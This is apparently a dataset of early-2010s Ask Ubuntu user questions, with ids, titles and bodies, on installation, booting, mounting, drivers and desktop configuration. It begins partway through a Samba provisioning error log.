passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` map to guest '' ignoring unknown parameter `` map to guest '' unknown parameter encountered : `` usershare allow guests '' ignoring unknown parameter `` usershare allow guests '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` max log size '' ignoring unknown parameter `` max log size '' unknown parameter encountered : `` syslog '' ignoring unknown parameter `` syslog '' unknown parameter encountered : `` passdb backend '' ignoring unknown parameter `` passdb backend '' unknown parameter encountered : `` unix password sync '' ignoring unknown parameter `` unix password sync '' unknown parameter encountered : `` passwd program '' ignoring unknown parameter `` passwd program '' unknown parameter encountered : `` pam password change '' ignoring unknown parameter `` pam password change '' unknown parameter encountered : `` map to guest '' ignoring unknown parameter `` map to guest '' unknown parameter encountered : `` usershare allow guests '' ignoring unknown parameter `` usershare allow guests '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' unknown parameter encountered : `` guest ok '' ignoring unknown parameter `` guest ok '' traceback ( most recent call last ) : file `` /usr/share/samba/setup/provision '' , line 256 , in < module > useeadb=eadb , next_rid=opts.next_rid , lp=lp ) file `` /usr/lib/pymodules/python2.7/samba/provision/__init__.py '' , line 1602 , in provision sitename=sitename ) file `` /usr/lib/pymodules/python2.7/samba/provision/__init__.py '' , line 584 , in guess_names raise invalidnetbiosname ( netbiosname ) samba.provision.invalidnetbiosname : the name ''vigneshmoha-vpcea13en '' is not a valid netbios name dpkg : error processing samba4 ( -- configure ) : subprocess installed post-installation script returned error exit status 1
168736	how to start gui from command line ?	i 've installed the following version of ubuntu om my machine . ubuntu-12.04-desktop-i386.iso but when i switch on the computer , i get command line . ubuntu 12.04 lts comp-1245 tty1 once i provide my username and password , it authenticates login and then displays a link to documentation . now , how can i start gui ? i 'm stuck at command line ?
168748	unable to install ubuntu 12.04 on dell inspiron 14z	i just got my new dell inspiron 14z laptop , i am trying to install ubuntu 12.04 , i already have windows installed on it . we can install ubuntu 12.04 but it disappears once we restart it and model is inspiron 5423 ultrabook . i am trying for a dual boot version , i mean to run ubuntu along with windows . how do i do it ? a quick googling did not help me much . how do fix it and get it installed .
168750	how to install thunderbird in old version ubuntu 9.xx ?	i tried to used these commands at the root terminal : sudo sed -i -e 's/archive.ubuntu.com/old-releases.ubuntu.com/g ' /etc/apt/sources.list sudo apt-get update & & sudo apt-get dist-upgrade the result is it could not find . then using the add/ remove gui , i also could not load the thunderbird to install . i have very little linux command text knowledge . how can i get and install thunderbird into my old ubuntu v9.xx ?
168752	how to run dolphin instead of nautilus ?	for various reasons , one being that i like it more , i want to run dolphin as my default file manager in stock ubuntu 12.04 . i 've installed dolphin . i 've done : sudo mv /usr/bin/nautilus /usr/bin/natilus.back & & sudo ln -s /usr/bin/dolphin /usr/bin/nautilus which makes any program calling nautilus open dolphin instead . this is all fine and dandy so far but dolphin wants to call konsole as the default terminal but i would like to make it call gnome-terminal as default instead . i tried : sudo ln -s /usr/bin/gnome-terminal /usr/bin/konsole making a link of gnome-terminal called konsole , but that did not work . i do n't get an error from dolphin anymore but just nothing happens . the terminal panel is just blank . anyone know how to do this , or if there is a better way to implement dolphin as default fm i 'm all ears . update 20120727 since then i realized that i had not used a sym link in the first place . instead , i used a more clever approach make a folder in your home directory called bin mkdir ~/bin make a script called nautilus that executes dolphin and put it in this folder gedit ~/bin/nautilus then copy this code into it and save # ! /bin/bash exec dolphin $ @ exit 0 this is the safest way to make dolphin your default browser , as well as going into the /usr/share/applications folder and changing the 3 nautilus .desktop files to launch dolphin instead of nautilus . but this does not fix the two problems dolphin has it wants to launch the konsole terminal instead of gnome-terminal . it 's icons are hideous and qt4-qtconfig can not change them . update 20120810 to fix the ugly oxygen icons to match your system theme , qt4-qtconfig tool is not sufficient . you will need to install the kde system settings application sudo apt-get install systemsettings launch the application from there go to application appearance > icons and change as needed my default file manager in ubuntu 12.04 gnome-shell is now the qt dolphin file manager . i 'm a genious ! ! ! ! this works perfect ! thanks to you all ! !
168754	eclipse sans font is not readable	ubuntu 12.04 , oracle java 7 , eclipse indigo/juno . have following trouble ( same in code for final member names and static methods ) : font seems like sans , tried to change it to bitstream sans , no changes . how to make it clear ? ps : i 've changed all occurancies of sans font , but it still looks same . and after all i would like to figure out and solve problem , not just remove symptoms . i 've tried both 1.7 and 1.6 oracle java .
168759	can i share my home directory between ubuntu and another linux os ?	i am currently in the process of reinstalling my laptop . i 've been using ubuntu so far , and now would like to install opensuse additionally . i will use both os 's with mostly the same application ( i. e. gnome 3 ones largely , plus mozilla stuff and libreoffice ) . can i just create a /home partition that 's used by both os 's and expect it to work or is it likely there are complications ?
168761	sometimes windows 7 nas can not be mounted	i can successfully connect my xubuntu pc ( cable-connected to office network ) to a windows nas using this line in /etc/fstab : //hall/share /media/hallshare cifs credentials=/root/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 and running : sudo mount -a the mount is automatic on boot . the problem is that often ( but not always ) when i turn on my pc , nas is not mounted ( that is /media/hallshare is empty and sudo mount -l does n't list anything related to this folder ) . and when i try to manually run sudo mount -a , the command hangs with no messages for indefinite time : lorenzo @ pc : ~ $ sudo mount -v -a mount : proc giă montato su /proc mount : uuid=3c72b8d3-a568-46bd-9fa0-1fa59532b579 giă montato su /home mount.cifs kernel mount options : ip=192.168.1.112 , unc=\\hall\share , credentials=/root/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 , ver=1 , user=lorenzo-1 , pass=******** i can not find anything in /var/log/dmsg . can somebody help me to identify the problem ? here is my /etc/fstab : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # windows nas ( \\hall ) //hall/share /media/hallshare cifs credentials=/root/.smbcredentials , noauto , iocharset=utf8 , _netdev , file_mode=0777 , dir_mode=0777 0 0 and my /etc/rc.local : mount /media/hallshare exit 0
168765	how to figure out why a sata hard-drive wont show in /dev/ and ( therefore ) wont mount	i had an external hard-drive which got messed up . i then opened it and plugged the sata-hard-drive directly into my computer . but after boot it is just showing my ide-hard-drive on which the os is . no secondary is shown . sudo blkid -o list -w /dev/null device fs_type label mount point uuid -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - /dev/sda1 ntfs system-reserviert /media/system-reserviert fae80411e803cb39 /dev/sda2 ntfs /media/4af809faf809e4d3 4af809faf809e4d3 /dev/sda5 ext4 / fb8c4c85-12dc-44ad-a1e3-3b9b0ceb278f /dev/sda6 ext4 /home 7560f5da-cd21-4fca-9d87-b8921c058b87 /dev/sda7 swap < swap > e8a31868-91c2-4da5-8551-f7a9a8d4e536 - fdisk -l platte /dev/sda : 203.9 gbyte , 203927027200 byte 255 köpfe , 63 sektoren/spur , 24792 zylinder einheiten = zylinder von 16065 × 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa252a252 gerät boot . anfang ende blöcke id system /dev/sda1 * 1 13 102400 7 hpfs/ntfs partition 1 endet nicht an einer zylindergrenze . /dev/sda2 13 8414 67481600 7 hpfs/ntfs /dev/sda3 8415 24793 131560449 5 erweiterte /dev/sda5 8415 13278 39061504 83 linux /dev/sda6 13278 24219 87889920 83 linux /dev/sda7 24220 24793 4606976 82 linux swap / solaris - sudo lsusb bus 007 device 002 : id 03f0:0805 hewlett-packard hp4470c bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 003 : id 03f0:6204 hewlett-packard deskjet 5150c bus 003 device 002 : id 192f:0416 avago technologies , pte . bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i found some entries at the syslog which might be related : [ 0.771747 ] ata3 : sata max udma/133 cmd 0xd800 ctl 0xdc00 bmdma 0xe800 irq 19 [ 6.320028 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 10.820029 ] ata3 : srst failed ( errno=-16 ) [ 16.370030 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 20.390081 ] ata3 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 20.410139 ] ata3.00 : failed to identify ( init_dev_params failed , err_mask=0x80 ) [ 30.940029 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 35.440032 ] ata3 : srst failed ( errno=-16 ) [ 40.990028 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 44.230062 ] ata3 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 44.250138 ] ata3.00 : failed to identify ( init_dev_params failed , err_mask=0x80 ) [ 44.250143 ] ata3 : limiting sata link speed to 1.5 gbps [ 54.780030 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 59.280027 ] ata3 : srst failed ( errno=-16 ) [ 64.830029 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 68.250061 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) [ 68.270137 ] ata3.00 : failed to identify ( init_dev_params failed , err_mask=0x80 ) [ 78.800049 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 83.300049 ] ata3 : srst failed ( errno=-16 ) [ 88.850030 ] ata3 : link is slow to respond , please be patient ( ready=0 ) [ 91.670060 ] ata3 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) it is possible that not just the usb controller of the external shell got damaged , but also the drive itself . but how do i make sure that the hard-drive is damaged , and therefore not showing itself in /dev ?
168767	can centerim support multiple jabber accounts ?	i 've been trying to use more cli programs lately and have been messing around with centerim . after a bit of messing around i 've successfully managed to get my google talk account working on it , but i was wondering if it 's possible to have multiple jabber accounts with centerim . i would like to replace my gui im with centerim and unless i can get multiple jabber accounts i wo n't be able to . on a side note , i ca n't seem to get my aim account to connect either ... my credentials are correct but i think the login server might be wrong . any help with this part would be greatly appreciated ! thanks in advance !
168770	problem in installing ubuntu 12.04 lts	i am novice to the linux . i used ubuntu on my laptop . recently in my lab i tried to use ubuntu as dual boot on workstation dell precision 3500chasis . configuration is as follows : intel ( r ) xeon ( r ) w3670 3.2ghz . 12 m cache.6c . 24 ( 6*4 ) gb ram . after boot from cd , only ubuntu logo showed up , after that it parses some line on screen , the process stop at that point only . i boot opensuse 11.3 with cd , it works . but i want to use ubuntu instead . does anyone have any ideas ? i would be ever so grateful for your help .
168776	can not install guest additions in ubuntu 12.10 alpha 2	i can not install guest additions in ubuntu 12.10 alpha 2 . autorun prompt will not successfully launch . running in terminal , after uncompressing additions terminal will suddenly close . i tried to run something in additions iso , it works but i ca n't adjust hd resolutions like 1920x1080 and self-adjusted resolution . ( self-adjusted resolution means auto resize guest display one . help ! the next question , will it happen again in 12.10 daily build and 12.10 alpha 3 that just have released today or yesterday ? ? ?
168778	want a dual-boot menu at each start-up	i have installed ubuntu 12 . 04 in a separate partition in a pre-installed windows 7 laptop . initially when i start up the machine it gives me a menu to choose between two oss.then after updating ubuntu system by default boots to ubuntu . so i posted a question here with the help of one response now i get the default boot to windows7 . but i want boot menu at each startup to choose between windows and ubuntu . i have tried easybcd . after adding an entry in easybcd a boot menu appears in startup.but when i choose ubuntu after a black screen the purple screen of ubuntu comes for 2-3seconds and then windows is booted .
168780	the update command give some error	when i tried to update my computer by write command in terminal , there is error shown on the terminal as follows reading package lists ... done w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems
168781	ubuntu-12.04 nm-applet : failed to register as an agent	nm-applet : failed to register as an agent '' wireless network authentication request '' dialogue box not prompting for the wireless password since nm-applet is not registered as an agent . are there any options to rectify this issue ? please share . log message message : applet now removed from the notification area ( nm-applet:4289 ) warning ** : gdkpixbuf-critical ** : gdkpixbuf_scale_simple : assertion 'dest_width > 0 ' failed message : applet now embedded in the notification area ( nm-applet:4289 ) warning ** : failed to register as an agent : ( 32 ) no session found for uid 0 message : starting applet secret agent because gnome shell disappeared ( nm-applet:4289 ) warning ** : failed to register as an agent : ( 32 ) no session found for uid 0 ( nm-applet:4289 ) warning ** : async_got_type : could not read properties for /org/freedesktop/networkmanager/activeconnection/8 : method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' does n't exit ( nm-applet:4289 ) warning ** : async_got_type : could not read properties for /org/freedesktop/networkmanager/activeconnection/8 : method `` get '' with signature `` ss '' on interface `` org.freedesktop.dbus.properties '' does n't exit
168786	how can i install eclipse 4 ?	i am current on ubuntu 12.04. and the eclipse available through the software center is version 3.7 . but eclipse 4 is already out there for windows . when will eclipse 4 be available for ubuntu , can i install it now ?
168789	login screen corruption	this is what i get in the login screen , it disappears only when i move the mouse and it only happens in the login screen . this is ubuntu 12 . 04 running over an intel desktop board dg31pr and i 'm using the onboard video . any help will be appreciated .
168792	how to remount /home and etc ... with virtual machine	so on one of my machines running windows ... i have vmware running ubuntu i was wondering if it were possible to : remount full client /home/user â host rw /users/windows_user_directory ; so that all ubuntu home/user/downloads write to windows /user/downloads ; same with documents and etc ... or remount any under /home/ ( in the event that full home can not be mounted ) or can the home directory or sub directories be mounted on a realtime compressed archive . ( like a compressed downloads folder )
168793	error installing sqlite	when i tried to install sqlite3 using the command sudo apt-get install sqlite3 , i got the error no apport report written because the error message indicates an issue on the local system processing triggers for man-db ... processing triggers for gnome-menus ... errors were encountered while processing : /var/cache/apt/archives/thunderbird_14.0+build1-0ubuntu0.12.04.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
168795	how do i extract a specific file from a tar archive ?	hi is possible to restore a single file from the .tar backup ? i dont want to restore total backup . i just want to restore one single file from the backup .
168802	how to install pre-installed ubuntu 12.04 in beagleboard-xm board ?	i purchased new beagleboard-xm . can you please tell me , how to install ubuntu 12.04 in sdcard , and load it in beagleboard-xm ? i downloaded the img.gz file from https : //wiki.ubuntu.com/arm/omap
168803	application development - basic how to questions	after the ubuntu app showdown is over , i would like to bring some of my tools programmed for windows in the software center . since i 'm new into programming for linux i still have some questions : 1 ) i have some dependencies ( e.g . blast ) . i read that i can configure in quickly the dependencies that they will be automatically installed with my tool . what i have to add into the file , the link , the name of the tool or something else ? an example would be great . 2 ) those dependencies produce several ( large ) output files . where such files are created and should i move them into my application folder for parsing them ? 3 ) my application creates several files . where is the best place for storing them in the folder structure of my app created from quickly ? how about read and write accessibility of the files ? 4 ) any other tips or suggestions about i have to take care or which are different from windows os ? any help is very appreciated !
168805	portable virtual machine with preinstalled ubuntu for windows ?	i download `` damn small linux ( dsl ) '' distribution from ( http : //ftp.belnet.be/packages/damnsmalllinux/current/dsl-4.4.10-embedded.zip ) and this distribution has a very interesting version called `` embedded '' that has qemu with a dsl virtualmachine already setup and ready to use by just running a simple .bat file in windows just like an application . so i was wondering , is there any qemu ready setup with an ubuntu virtual machine ready to use ? i do n't want to install anything because i want it on my office pc as an application that i can run and play with . i know the existence of wubi , virtualbox , vmware , but again , i do n't want to install anything , i 'm looking for the same behavior as the dsl embeded but running ubuntu .
168815	how to get graphical display when executing commands as another user , through terminal ?	in my terminal , i did $ su nextuser and logged in to that account . now , when i try to open a text file in the home directory of that user by $ gedit test.c i get no protocol specified can not open display : run 'gedit -- help ' to see a full list of available command line options . how can i use the graphical text editor to display files on the new user 's account ?
168823	how to change the nautilus keyboard shortcut for changing tabs ?	i 'm looking for a way to change the keyboard shortcut for changing tabs from ctrlpageup to ctrltab . i think it 's a very common and useful shortcut and i was surprised to discover it is n't include in the keyboard shortcuts editor .
168825	what permission do i need to add a printer	i try to install my printer using the following command : hp-setup 10.2.1.99 as you might expect my printer has the ip 10.2.1.99 . it is a hp color laserjet 2700n . everything works well until the very last step when i have chosen the ppd file and clicked add printer . i then get prompted with a box where i can write username and password , and the text : you do not have permission to add a printer i 've tried entering credentials to all accounts i can think of that exists in our office , but it does not seem to work . if i press cancel when prompted , i get this text in the console : printer queue setup failed . could not connect to cups server . is user added to `` lpadmin '' group ( s ) what permission is it that i need ?
168829	name of a program for configure startup services	i forgot it , that program is in ubuntu official repositories from my memory ... that program have a [ ] box for tick # before each services . it is not chkconfig , sysv-rc-conf , thanks !
168838	update manager is not appearing in main dash .	i am currently a user of ubuntu 11.10 on a dell n4030 , however my update manager is not appearing in dash home . i would like to update it to 12.04 , but whenever i am trying with other alternate technique i receive an error such as below : vpsingh @ vpsingh-inspiron-n4030 : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? very normal operation , i have no idea what the problem is . any ideas or help would be greatly appreciated . thanks !
168842	eclipse stop auto complete text from being white	when pressing ctrl space to auto complete a method call , the list of methods displayed looks fine except the one that is currently selected . the font is turned white making it unreadable . what configuration option exists to change this ? i can not find a reference to this ui element anywhere in the settings . i would screenshot this issue but it 's not possible due to the popup becoming almost see through when the print screen key is pressed .
168849	downgrade form php5 5.3.10 to php5 5.3.2 in ubuntu 12.04	i wanted to install php5 5.3.2 , so first deleted all the php5 files sudo apt-get purge php5 php5-cli php5-common php5-mysql and also delete the deb files form /var/cache/apt/archives so now there is no deb file on the system then i add this person repository sudo apt-add-repository ppa : sushkov/personal because he add php5.3.2 and then i updated it and upgraded it sudo apt-get update & & sudo apt-get upgrade then i installed php5 sudo apt-get install php5 php5-cli php5-common php5-mysql now when i check the php version it says php5.3.10 and when i run this command sudo apt-cache show php5 it says package : php5 version : 5.3.15-1~dotdeb.0 architecture : all maintainer : guillaume plessis < gui @ dotdeb.org > installed-size : 0 depends : libapache2-mod-php5 ( > = 5.3.15-1~dotdeb.0 ) | libapache2-mod-php5filter ( > = 5.3.15-1~dotdeb.0 ) | php5-cgi ( > = 5.3.15-1~dotdeb.0 ) | php5-fpm ( > = 5.3.15-1~dotdeb.0 ) , php5-common ( > = 5.3.15-1~dotdeb.0 ) filename : dists/squeeze/php5/binary-i386/php5_5.3.15-1~dotdeb.0_all.deb now i dont know how to downgrade , is there any way that i change something in the repository and write sudo apt-get install php5 it will install php5.3.2 which i want instead of php5.3.10 thanks
168858	how can i download attachments from emails through terminal using getmail ?	i know i can download emails using a client , but is there a way to download emails straight from the terminal ? i 'm trying to fetch some emails from my gmail to later do some analysis on certain emails . edit : thank you for all the answers . right now , i found a way to do it with getmail . but i encountered a small issue . it downloads the emails and attachments , but it prints everything in text . is there a way to actually retrieve said attachment ?
168859	how to change default action when running a .sh file ?	every time i want to run a .sh file , ubuntu asks whether i want to run in terminal/display/run it . is there a way to set default action for some sh files ? -- i am using ubuntu 12.04 without any special changes .
168867	how to get apt-get to call apt-fast ?	have been using apt-fast for a while now and really liking it . in case you do n't know it is useful to speed up apt-get . however , i have a few questions regarding apt-fast : i would like to make any call to apt-get run apt-fast . i 'm assuming i can put a script called `` apt-get '' in my ~/bin folder that executes apt-fast ... so maybe i 'm answering my own question on this first one . would a script like this work ? # ! /bin/bash exec apt-fast $ @ exit 0 apt-fast does not seem to speed up the very thing i wish it sped up most - apt-get update i would like apt-fast to make apt-get update run faster . is this possible ?
168874	can i install ubuntu on my sdcard and improve performance ?	i am going to do a reinstall of ubuntu on my laptop this holiday . i have an asus ul30vt , with no flash drive , and i just wondered . i never use my card-reader for anything , but i have a 32gb sd-card that i do not use really . i was then wondering if installing ubuntu on that sd-card will improve my performance much ? would it be like ssd
168878	how do i install a vnc server ?	i want to install some vnc server on my ubuntu 12.04. which one is the best / recommended ? how do i configure it ? all i want is to be able to connect my desktop computer through my laptop . i want something simple like connecting with rdp protocol between windows computers .
168879	shutdown from terminal without entering password ?	i have desktop edition of ubuntu . i like the terminal so that that i prefer to shutdown my computer with the shutdown command . however when i type shutdown now it prompts me to enter my password.is there any way i can shutdown my computer using this command without entering my password ?
168886	how do i install librsvg 2.36 on lucid ?	as i believe , latest librsvg for lucid ( that is 2.26.3 ) seems to have a bug in that it shifts the layers of the image . i tried to build it from source but then i had to build dependencies , and they also have dependencies ... is there an easier way to install 2.36 ? i 'm a newbie in linux , any guidance would be appreciated .
168887	how can i add cut/copy/paste functionality to my application ?	i 'm developing an electoral calculator ( https : //launchpad.net/electoralcalculator ) using python 2.7 , gtk+3 and glade and i want to add cut/copy/paste functionality to my application . i want to give the user the opportunity to cut/copy/paste text using menu items ( edit > cut , edit > copy , and edit > paste ) , toolbar buttons or keyboard shortcuts ( ctrl+x , ctrl+c , and ctrl+v ) . how can i get the selected text to cut/copy it ? there are many text entry widgets and the selected text can be in any of them . how can i know where the cursor is , so i can paste the contents of the clipboard there ? i found about this example : http : //python-gtk-3-tutorial.readthedocs.org/en/latest/clipboard.html but while in this example there is only one text entry widget , in my application there are plenty of them . how can i know where the selected text is ( in which text entry widget ) to cut/copy it ? how can i know where the cursor is for the paste functionality ? english is not my first language , please forgive my errors . thanks for your help edit : i wrote an example with working cut , copy , and paste buttons based on ian's/timo 's code . thank you both , timo and ian b. , for your help . i really appreciate it . let me know if there 's something wrong in the example . the keyboard shortcuts ( ctrl+x , ctrl+c , and ctrl+v ) work automagically without adding any code . from gi.repository import gtk , gdk class twotextwindow ( gtk.window ) : __gtype_name__ = `` twotextwindow '' def __init__ ( self ) : super ( twotextwindow , self ) .__init__ ( ) self.connect ( 'delete-event ' , gtk.main_quit ) self.vbox = gtk.vbox ( false , 8 ) for x in range ( 4 ) : self._build_entry ( ) button_cut = gtk.button ( label='cut ' ) button_cut.connect ( 'clicked ' , self.on_cut_clicked ) self.vbox.pack_start ( button_cut , false , false , 0 ) button_copy = gtk.button ( label='copy ' ) button_copy.connect ( 'clicked ' , self.on_copy_clicked ) self.vbox.pack_start ( button_copy , false , false , 0 ) button_paste = gtk.button ( label='paste ' ) button_paste.connect ( 'clicked ' , self.on_paste_clicked ) self.vbox.pack_start ( button_paste , false , false , 0 ) self.add ( self.vbox ) self.show_all ( ) # code for other initialization actions should be added here . self.clipboard = gtk.clipboard.get ( gdk.selection_clipboard ) def _build_entry ( self ) : entry = gtk.entry ( text='hello , world ! ' ) entry.connect ( 'focus-in-event ' , self.on_entry_focus ) self.vbox.pack_start ( entry , false , false , 0 ) def on_cut_clicked ( self , widget ) : # get the bounds of the selected text bounds = self.focus.get_selection_bounds ( ) # if the bounds of the selection are not an empty tuple , # put the selection in the variable chars # and copy it to the clipboard # ( get_selection_bounds returns an empty tuple if there is no selection ) # then delete the selection if bounds : chars = self.focus.get_chars ( *bounds ) print `` copying ' % s ' from : % s '' % ( chars , self.focus ) self.clipboard.set_text ( chars , -1 ) print `` deleting text selection : characters from position % s to % s '' % ( bounds [ 0 ] , bounds [ 1 ] ) self.focus.delete_text ( bounds [ 0 ] , bounds [ 1 ] ) else : print `` ca n't cut if you do n't select text '' def on_copy_clicked ( self , widget ) : # get the bounds of the selected text bounds = self.focus.get_selection_bounds ( ) # if the bounds of the selection are not an empty tuple , # put the selection in the variable chars # and copy it to the clipboard # ( get_selection_bounds returns an empty tuple if there is no selection ) if bounds : chars = self.focus.get_chars ( *bounds ) print `` copying ' % s ' from : % s '' % ( chars , self.focus ) self.clipboard.set_text ( chars , -1 ) else : print `` ca n't copy if you do n't select text '' def on_paste_clicked ( self , widget ) : # get the text from the clipboard text = self.clipboard.wait_for_text ( ) if text ! = none : # if there 's text selected in the target # delete it and paste the contents of the clipboard bounds = self.focus.get_selection_bounds ( ) if bounds : print `` deleting text selection : characters from position % s to % s '' % ( bounds [ 0 ] , bounds [ 1 ] ) self.focus.delete_text ( bounds [ 0 ] , bounds [ 1 ] ) print `` pasting ' % s ' into : ' % s ' at the position % s '' % ( text , self.focus , bounds [ 0 ] ) self.focus.insert_text ( text , bounds [ 0 ] ) # else insert the text in the current position of the cursor in the target else : pos = self.focus.get_position ( ) # print `` cursor position in the target : % s '' % pos print `` pasting ' % s ' into : ' % s ' at the position % s '' % ( text , self.focus , pos ) self.focus.insert_text ( text , pos ) else : print `` no text on the clipboard . '' def on_entry_focus ( self , widget , event ) : print `` focused : '' , widget self.focus = widget if __name__ == '__main__ ' : win = twotextwindow ( ) gtk.main ( )
168891	stuck between upgrade versions -- ubuntu	i am stuck between version 10.04 and 10.10 of ubuntu . i started upgrading when the computer cashed ; now i can not boot back to the hard drive . i am currently up on a live 10.10 cd . how can i proceed ? as a side note i would prefer not having to reformat the hard drive as for i have a few files that i need to affirm that i have backups of .
168895	getting google talk/skype to work with pulseaudio	google talk/skype will not transmit my voice . my microphone works in sound recorder , and i can see levels moving when i check sound settings in gmail . how do i fix this
168896	what do i select for configuring grub-pc after an update ?	after the update , the configuring grub-pc popped out with the question : what do you want to do about modified configuration file grub ? the help button says : a new version of configuration file/etc/default/grub is available , but the version installed currently has been locally modified . what should i select ? thanks !
168902	easiest way to stream videos from my server ?	i 'd like to download movie torrents from my ubuntu server as its download speed is much higher than at home . however , it is pretty pointless if i then have to download the movie from my server to my laptop so i thought a good compromise would be to stream the movies . what is the easiest way to do so ? my only requirements are that everything on the server side should be done through the command line ( ssh ) and if possible , minimal dependencies . my media player is vlc but i would n't mind using a web browser to watch the videos . related question : how do i stream a video in my server to my computer ?
168905	why cant i find the programs i had on windows on ubuntu ?	i just installed ubuntu but i cant find the files that i had on windows ?
168908	how do i disable guest session on ubuntu 12.04lts ?	i do n't really want anyone else being able to use my computer . how do i disable the guest session option that you get when being prompted to login ?
168909	why is wifi not working on my hp laptop ?	the wireless card is not working but the internet is working good with ethernet cable . the output of lspci is : 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) at fist the card was working but sometimes it 's disconnected , and have problem on coverage range , and sometimes it 's not working at all i tried many solutions on the internet but now it 's not working at all . i do n't know what to do : (
168910	ubuntu suddenly wo n't load	i was using the computer and i went back to windows and it launched in start-up repair . now when i try to start ubuntu this screen comes up that says something about grub files and talks about giving some command . then it has grub > and a blinking cursor . i honestly do n't know how to get rid of it and i would just uninstall and reinstall ubuntu but i do n't want to lose my files which i had n't backed up . help ?
168913	how to dualboot ubuntu on asus zenbook ux32vd ?	i have just purchased a asus zenbook ux32vd and it will arrive on monday . however , i do not know how to dualboot ubuntu on this , because of two reasons : it is a hybrid 500gb hdd + 30gb ssd , therefore the os has to be smart enough to use the ssd to speed things up . but what does this mean when selecting partitions etc . while installing ubuntu next to windows 7 ? it does not have an optical drive ; windows 7 is preinstalled . what steps should i follow to dualboot ubuntu on this correctly ? will this cope with the hdd+ssd hybrid technology ?
168916	external hard-drive is `` clicking '' when idle	i 'm struggling with a very annoying issue : my new hard-drive ( samsung spinpoint m8 1tb ( hn-m101mbb ) was build in an usb 3.0 external case ( lian li ex-10qr ) and formatted with ext4 . when this hard-drive is connected to my notebook via usb 2.0 it `` klicks '' , the led flashs too , every second , but only when it 's idle ! it stays silent , when something is copying or reading from it . but when this drive was formatted with ext3 or fat , it always remained silent . this also happens with a western digital wd10jpvt scorpio blue , but the `` klicks '' are even louder ! system : 12.04 64-bit with gnome-shell . any ideas how to approach this issue ?
168919	is there any documentation for nux ?	i 'm considering writing somethings that could benefit from running like unity . i know unity uses the nux toolkit for drawing itself but i ca n't find any documentation about it . is there a helpful little website somewhere that explains how non-canonical people can use nux , or do i have to pull unity apart and learn that way ?
168921	how to set a keyboard shortcut that is sent to ubuntu rather than active remote desktop ?	i have three workspaces : ws1 , ws2 and ws3 . in ws1 , i have an active remote desktop session to a windows computer , started with `` rdesktop `` . in ws2 , i have some bash terminals in ws3 , i have some text editors what i want to do is this : switch to and from ws1 with a keyboard shortcut . the problem i have is this : when in ws1 with an active rdesktop session , keyboard shortcuts are sent to the remote desktop rather than ubuntu , so the workspaces are not switched . is it possible to set some keyboard shortcuts that get sent to ubuntu rather than rdesktop ? edit 1 : rdesktop -k does not seem to work after the rdesktop session is interacted with .
168939	why does ubuntu only support versions for a limited time ( and what does it mean ) ?	why is it that ubuntu only support a version for a limited time ? since i have been on this site i have seen many references to particular versions not being supported . what does it actually mean ? after this time must a user just use the os in the state it is in at the date that support ends ? does this mean no more package updates are available ? or when this support date has elapsed , should the user then abandon the version and install a newer version instead ? i am slightly confused with the difference between ubuntu and linux here ( with windows you use it until you buy the latest version ) and would be grateful if someone could explain the ubuntu 'lifecycle ' ( if that is a suitable word ) . thanks in advance for your help .
168940	copy/paste with ubuntu and oracle virtual box .	for my business works i need windows xp . so i have choose oracle virtual box . but i am unable to copy any type of information into that . could any one help me to copy/paste the data and able to access the data from usb also . thank you .
